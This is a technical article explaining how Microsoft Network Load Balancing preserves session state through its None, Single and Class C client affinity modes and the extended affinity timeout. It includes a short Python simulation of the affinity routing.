NLB is a software-based load balancer (a Windows feature) that runs on each member of the cluster. Load balancing is based on the number of client connection requests; the NLB algorithm does not dynamically respond to changes in the load on each cluster host (such as CPU load, memory usage or network usage).
Thus, if the client population is small and/or the connections produce varying loads on the servers, the Microsoft NLB load balancing algorithm is less effective.
To understand how NLB preserves session state, first let me take you through the difference between stateless and stateful connections:
Stateless
An application connection is said to be stateless if the server does not store any state about the client session; instead, the session data is kept on the client side. The server does not rely on information from earlier requests.
** HTTP is a stateless protocol, as no session data is preserved between requests.
** Cookies and other software/add-ons are capable of storing session information about the client and can be used with HTTP to make the connection stateful.
Note: Stateless interactions - there is no impact or connection loss if the request is processed by a different server.
Stateful
An application connection is said to be stateful if the server stores session state and data about the client session. The server relies on information from the previous connection (the session) while processing new connection requests.
Note: Stateful interactions - there will be impact or connection loss if, after a session break, the request is processed by a different server and the client session data is not shared between the servers.
Managing Application/Session State
Session state refers to client data that is visible to a particular client for the duration of the session. The server application holding the client state information must share it with the other hosts in the cluster to prevent errors.
When an application maintains state information for the client connection, it is important to direct all TCP/UDP connections from that client to the same cluster host that is processing the request.
In terms of application data, changes to the data store must be synchronized across the hosts in the cluster. One example is to use a back-end database shared by all the instances of the application residing on the cluster hosts.
To maintain session state, Microsoft NLB uses the affinity rule options to direct all connections from a given client address, or class of client addresses, to the same cluster host.
Note: Client/server applications that embed session state within cookies, or push it to a back-end database, do not need client affinity to be maintained.
Client Affinity
NLB offers three types of affinity configuration to preserve session state, namely None, Single and Network (Class C).
1. None (No Affinity)
With this option no affinity rules are defined, and client connections from any source can be handled by any member host in the cluster. Useful for applications that do not need to store session information.
2. Single
With this option NLB maps clients to a specific host in the cluster based on the client's full IP address. Once a connection is established, requests coming from the same client IP address always reach the same member server in the cluster.
Useful for intranet applications, as intranet clients have IP addresses within a narrow range. For Internet applications, Single affinity becomes inefficient: the clients span a broad IP range, which also adds computing overhead to the distribution algorithm.
3. Network (Class C)
With this option NLB associates clients with a specific host in the cluster based on the Class C (/24) portion of the client IP address, i.e. the first three octets (the Class C range being 192.0.0.1 to 223.255.255.254). Connections from the same Class C address range always reach the same member server in the cluster. This is best suited to clusters serving Internet applications.
Extended Affinity Option:
This is only available for the Single and Class C affinity options and is enabled by setting a timeout value in the filtering options. When a connection is lost or interrupted, the cluster host keeps the client data for the specified duration, so that if the client reconnects within the timeout the client's preferences and selections are still preserved.
Ex: A customer using an online shop has products selected in the shopping cart. If the customer loses the connection and reconnects (whether due to a client-side or an application-side issue), the customer can still see the selected products in the cart, provided a timeout value is defined.
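As an added illustration (not part of the article), the following Python simulates the three affinity modes described above: the part of the client identity each mode uses as the key, a hash of that key onto the cluster members, and an extended-affinity timeout that keeps a disconnected client's binding so a reconnect within the window returns to the same host even after the member list changes. The host names, the hash function and the binding table are constructed for the example; NLB's real distribution algorithm is internal to the driver.

```python
import ipaddress
from typing import Dict, List, Tuple


def affinity_key(client_ip: str, client_port: int, affinity: str) -> str:
    """Part of the client identity NLB uses to choose a host in each mode:
    None -> ip:port (any connection may land anywhere), Single -> full client IP,
    Network -> the /24 (Class C) portion of the client IP."""
    ip = ipaddress.IPv4Address(client_ip)
    if affinity == "None":
        return f"{ip}:{client_port}"
    if affinity == "Single":
        return str(ip)
    if affinity == "Network":
        return str(ipaddress.IPv4Network(f"{ip}/24", strict=False))
    raise ValueError(f"unknown affinity mode: {affinity}")


def pick_host(key: str, hosts: List[str]) -> str:
    """Deterministic hash of the key onto the current member list (illustrative
    stand-in for the NLB distribution algorithm; constructed for this example)."""
    h = 0
    for ch in key:
        h = (h * 31 + ord(ch)) & 0xFFFFFFFF
    return hosts[h % len(hosts)]


class AffinityTable:
    """Single/Network affinity with the extended-affinity timeout (seconds)."""

    def __init__(self, affinity: str, hosts: List[str], timeout_s: float):
        self.affinity, self.hosts, self.timeout_s = affinity, list(hosts), timeout_s
        self._bindings: Dict[str, Tuple[str, float]] = {}  # key -> (host, expiry)

    def route(self, client_ip: str, client_port: int, now: float) -> str:
        key = affinity_key(client_ip, client_port, self.affinity)
        bound = self._bindings.get(key)
        if bound and bound[1] > now and bound[0] in self.hosts:
            return bound[0]  # reconnect within the timeout: same host, state intact
        host = pick_host(key, self.hosts)
        self._bindings[key] = (host, float("inf"))  # active connection never expires
        return host

    def disconnect(self, client_ip: str, client_port: int, now: float) -> None:
        """Connection lost: keep the binding only for the configured timeout."""
        key = affinity_key(client_ip, client_port, self.affinity)
        if key in self._bindings:
            self._bindings[key] = (self._bindings[key][0], now + self.timeout_s)
```

Adding a host to `hosts` after a disconnect shows the difference the timeout makes: a reconnect inside the window still returns to the original member, while a reconnect after expiry is re-mapped over the new member list.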
---------------------------------------------------------------------------------------------------------------------------------
Article author: Arjun Sunil
6+ years of experience in Windows Servers, Cloud & Virtualization.
---------------------------------------------------------------------------------------------------------------------------------